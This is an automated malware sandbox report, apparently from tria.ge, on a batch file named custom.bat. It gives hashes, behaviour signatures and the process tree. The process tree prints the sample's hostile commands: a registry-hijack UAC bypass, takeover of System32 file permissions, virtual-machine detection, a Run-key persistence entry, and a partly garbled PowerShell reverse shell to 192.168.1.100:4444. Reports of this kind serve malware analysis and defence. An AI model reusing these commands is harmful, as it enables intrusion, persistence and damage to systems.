Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    139s
  • max time network
    142s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/09/2024, 06:47

General

  • Target

    custom.bat

  • Size

    4KB

  • MD5

    1c63745d54962d205bb3ae879bea1ed4

  • SHA1

    a832c894a4e2b6d486c48b9ea6ec79d94df9537e

  • SHA256

    396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

  • SHA512

    129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39

  • SSDEEP

    96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\system32\mode.com
      mode con: cols=800 lines=60
      2⤵
        PID:3236
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4840
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:728
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
        2⤵
        • Modifies registry class
        PID:2740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:624
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\* /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3100
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\* /grant Admin:F /t /c
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1196
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:2860
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\Software\Classes\mscfile" /f
        2⤵
        • Modifies registry class
        PID:3196
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:4796
      • C:\Windows\system32\findstr.exe
        findstr /i "VirtualBox"
        2⤵
          PID:2184
        • C:\Windows\system32\systeminfo.exe
          systeminfo
          2⤵
          • Gathers system information
          PID:2912
        • C:\Windows\system32\findstr.exe
          findstr /i "VMware"
          2⤵
            PID:1016
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            2⤵
            • Gathers system information
            PID:920
          • C:\Windows\system32\findstr.exe
            findstr /i "Hyper-V"
            2⤵
              PID:1160
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2304
            • C:\Windows\system32\reg.exe
              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
              2⤵
              • Adds Run key to start application
              PID:4948
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\* /r /d y
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:4520
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\* /grant Admin:F /t /c
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:3596

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            5f4c933102a824f41e258078e34165a7

            SHA1

            d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

            SHA256

            d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

            SHA512

            a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            d405540758f0f5bdaab94f1a054cc67d

            SHA1

            07e307420a26d17c2dc1226af6e72018da4ae26c

            SHA256

            2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61

            SHA512

            59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l52g0prf.5gj.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

            Filesize

            285B

            MD5

            4577f08330df24a350ff523ec87bf38e

            SHA1

            5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

            SHA256

            5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

            SHA512

            ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

          • memory/4840-0-0x00007FFDAEE53000-0x00007FFDAEE55000-memory.dmp

            Filesize

            8KB

          • memory/4840-1-0x0000014D10B10000-0x0000014D10B32000-memory.dmp

            Filesize

            136KB

          • memory/4840-10-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

            Filesize

            10.8MB

          • memory/4840-11-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

            Filesize

            10.8MB

          • memory/4840-12-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

            Filesize

            10.8MB

          • memory/4840-15-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

            Filesize

            10.8MB